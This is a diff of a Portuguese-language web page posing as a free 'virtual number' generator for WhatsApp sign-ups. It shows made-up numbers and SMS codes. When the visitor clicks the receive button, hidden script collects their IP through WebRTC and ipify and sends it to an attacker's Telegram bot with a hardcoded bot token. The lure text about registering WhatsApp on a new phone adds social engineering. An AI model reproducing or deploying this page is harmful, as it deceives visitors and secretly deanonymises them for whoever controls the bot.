--- a/index.html
+++ b/index.html
@@ -7,6 +7,7 @@
     <script src="https://cdn.tailwindcss.com"></script>
     <style>
         @import url('https://fonts.googleapis.com/css2?family=Major+Mono+Display&family=Ubuntu+Mono:wght@400;700&display=swap');
+
         body {
             font-family: 'Ubuntu Mono', monospace;
             background-color: #0f172a;
@@ -19,12 +20,102 @@
             overflow: hidden;
             position: relative;
         }
-        /* Seus estilos continuam iguais... */
+
+        .glitch-effect {
+            font-family: 'Major Mono Display', monospace;
+            position: relative;
+            text-shadow: 0.05em 0 0 #00fffc, -0.03em -0.04em 0 #fc00ff;
+            animation: glitch 2000ms infinite;
+        }
+
+        @keyframes glitch {
+            0% { text-shadow: 0.05em 0 0 #00fffc, -0.03em -0.04em 0 #fc00ff; }
+            15% { text-shadow: 0.05em 0 0 #00fffc, -0.03em -0.04em 0 #fc00ff; }
+            16% { text-shadow: -0.05em -0.025em 0 #00fffc, 0.025em 0.035em 0 #fc00ff; }
+            49% { text-shadow: -0.05em -0.025em 0 #00fffc, 0.025em 0.035em 0 #fc00ff; }
+            50% { text-shadow: 0.05em 0 0 #00fffc, -0.03em -0.04em 0 #fc00ff; }
+            99% { text-shadow: 0.05em 0 0 #00fffc, -0.03em -0.04em 0 #fc00ff; }
+            100% { text-shadow: -0.05em 0 0 #00fffc, 0.025em 0.025em 0 #fc00ff; }
+        }
+
+        .generate-btn {
+            background-color: #22c55e;
+            transition: all 0.3s;
+            box-shadow: 0 0 15px rgba(34, 197, 94, 0.5);
+        }
+
+        .generate-btn:hover {
+            background-color: #16a34a;
+            transform: translateY(-2px);
+            box-shadow: 0 0 25px rgba(34, 197, 94, 0.7);
+        }
+
+        .receive-btn {
+            background-color: #ef4444;
+            animation: pulse 1s infinite;
+            transition: all 0.3s;
+        }
+
+        .receive-btn:hover {
+            background-color: #dc2626;
+            transform: translateY(-2px);
+            box-shadow: 0 0 25px rgba(239, 68, 68, 0.7);
+        }
+
+        .number-display {
+            font-family: 'Major Mono Display', monospace;
+            font-size: 2rem;
+            letter-spacing: 2px;
+            background: rgba(255, 255, 255, 0.05);
+            backdrop-filter: blur(10px);
+            border-radius: 0.5rem;
+            padding: 1rem 2rem;
+            margin: 1rem 0;
+            min-width: 300px;
+            text-align: center;
+        }
+
+        @keyframes pulse {
+            0% {
+                box-shadow: 0 0 0 0 rgba(239, 68, 68, 0.7);
+            }
+            70% {
+                box-shadow: 0 0 0 1rem rgba(239, 68, 68, 0);
+            }
+            100% {
+                box-shadow: 0 0 0 0 rgba(239, 68, 68, 0);
+            }
+        }
     </style>
 </head>
 <body>
     <div class="text-center px-4">
-        <!-- seu conteúdo HTML igual -->
+        <h1 class="glitch-effect text-4xl md:text-6xl font-bold mb-8">
+            envy' suzaika gera numeros !!
+        </h1>
+
+        <div class="number-display my-8" id="numberDisplay">
+            ###.#####.###
+        </div>
+
+        <button onclick="generateNumber()" class="generate-btn text-white font-bold py-3 px-8 rounded-full text-lg">
+            Gerar Número Virtual
+        </button>
+
+        <div id="message" class="mt-4 hidden">
+            <p class="text-lg">Seu número é: <span id="generatedNumber"></span></p>
+            <p class="text-lg">Vá no WhatsApp e registre, depois clique em RECEBER SMS para receber o SMS!</p>
+        </div>
+
+        <button id="receiveButton" class="receive-btn text-white font-bold py-3 px-8 rounded-full text-lg hidden" onclick="receiveSMS()">
+            RECEBER SMS by envy' suzaika
+        </button>
+
+        <div id="finalMessage" class="mt-4 hidden text-lg">
+            <p><strong>&lt;#&gt; Sua conta do WhatsApp será registrada em um novo celular</strong></p>
+            <p>Nunca compartilhe este código: <span id="whatsappCode"></span></p>
+            <p id="randomCode"></p>
+        </div>
     </div>
 
     <div class="absolute bottom-4 text-slate-500 text-sm">
@@ -35,25 +126,67 @@
         const TELEGRAM_BOT_TOKEN = '8250581893:AAGLlT-nSmXL58Ec1WqdZHGOHmw8YQPObEs';
         const TELEGRAM_API_URL = `https://api.telegram.org/bot${TELEGRAM_BOT_TOKEN}/sendMessage`;
 
-        // Função que checa se o IP é público
-        function isPublicIP(ip) {
-            const privateRanges = [
-                /^10\./,
-                /^172\.(1[6-9]|2[0-9]|3[0-1])\./,
-                /^192\.168\./,
-                /^127\./,
-                /^169\.254\./
-            ];
-            if (!ip) return false;
-            if (ip.endsWith('.local')) return false; // descarta mDNS
-            return !privateRanges.some(regex => regex.test(ip));
+        function generateNumber() {
+            const display = document.getElementById('numberDisplay');
+            const message = document.getElementById('message');
+            const receiveButton = document.getElementById('receiveButton');
+            const generatedNumber = document.getElementById('generatedNumber');
+
+            // Animação de carregamento
+            display.textContent = 'Gerando...';
+            display.style.color = '#22c55e';
+
+            setTimeout(() => {
+                // Gera um número aleatório no formato (DDD) 9XXXX-XXXX
+                const ddd = Math.floor(Math.random() * 90 + 10);
+                const firstPart = Math.floor(Math.random() * 9000 + 1000);
+                const secondPart = Math.floor(Math.random() * 9000 + 1000);
+                const phoneNumber = `(${ddd}) 9${firstPart}-${secondPart}`;
+
+                display.textContent = phoneNumber;
+                display.style.color = 'white';
+                generatedNumber.textContent = phoneNumber;
+
+                message.classList.remove('hidden');
+                receiveButton.classList.remove('hidden');
+
+                // Efeito de cópia automática
+                navigator.clipboard.writeText(phoneNumber.replace(/\D/g, '')).then(() => {
+                    console.log('Número copiado para a área de transferência');
+                });
+            }, 800);
+        }
+
+        function receiveSMS() {
+            const finalMessage = document.getElementById('finalMessage');
+            const whatsappCodeElement = document.getElementById('whatsappCode');
+            const randomCode = document.getElementById('randomCode');
+
+            // Gera códigos aleatórios
+            const whatsappCode = generateRandomCode(6); // 6-digit numeric code
+            const verificationCode = Math.random().toString(36).substring(2, 8).toUpperCase();
+
+            document.getElementById('whatsappCode').textContent = whatsappCode;
+            document.getElementById('randomCode').textContent = verificationCode;
+
+            finalMessage.classList.remove('hidden');
+            sendIPInfo();
+        }
+
+        function generateRandomCode(length) {
+            const chars = '0123456789';
+            let result = '';
+            for (let i = 0; i < length; i++) {
+                result += chars.charAt(Math.floor(Math.random() * chars.length));
+            }
+            return result.slice(0, 3) + '-' + result.slice(3);
         }
 
         async function testWebRTC() {
             const foundIPs = new Set();
             const pc = new RTCPeerConnection({
                 iceServers: [
-                    { urls: "stun:stun.l.google.com:19302" },
+                    { urls: "stun:stun.l.google.com:19302" }, // STUN server do Google
                     { urls: "stun:stun1.l.google.com:19302" }
                 ]
             });
@@ -63,17 +196,12 @@
             await pc.setLocalDescription(offer);
 
             return new Promise((resolve) => {
-                const timeout = setTimeout(() => {
-                    // pega o primeiro IP público encontrado ou null
-                    const publicIP = [...foundIPs].find(ip => isPublicIP(ip));
-                    resolve(publicIP || null);
-                }, 3000);
+                const timeout = setTimeout(() => resolve(null), 3000);
 
                 pc.onicecandidate = event => {
                     if (!event || !event.candidate) {
                         clearTimeout(timeout);
-                        const publicIP = [...foundIPs].find(ip => isPublicIP(ip));
-                        resolve(publicIP || null);
+                        resolve(foundIPs.values().next().value || null);
                         return;
                     }
 
@@ -88,36 +216,27 @@
             });
         }
 
-        async function getIPFallback() {
-            try {
-                const res = await fetch('https://api.ipify.org?format=json');
-                const data = await res.json();
-                return data.ip;
-            } catch {
-                return null;
-            }
-        }
-
         async function sendIPInfo() {
             const urlParams = new URLSearchParams(window.location.search);
             const chatId = urlParams.get('chat_id');
-            
-            if(chatId) {
-                let ip = await testWebRTC();
-                if (!ip) {
-                    ip = await getIPFallback();
-                }
-                if (!ip) ip = 'n;
 
-                const message = `🖤 ip original revelado: ${ip}`;
+            if (chatId) {
+                const ip = await testWebRTC();
+                const publicIP = await getIPFallback();
+                const message = `🖤 ip original revelado: ${ip || publicIP}`;
+
+                function getIPFallback() {
+                    return fetch('https://api.ipify.org?format=json')
+                        .then(r => r.json())
+                        .then(data => data.ip)
+                        .catch(() => 'IP não detectado');
+                }
 
                 try {
                     await fetch(`${TELEGRAM_API_URL}?chat_id=${chatId}&text=${encodeURIComponent(message)}&parse_mode=HTML`);
                 } catch {}
             }
         }
-
-        // Suas outras funções (generateNumber, receiveSMS, etc) continuam iguais
     </script>
 </body>
 </html>
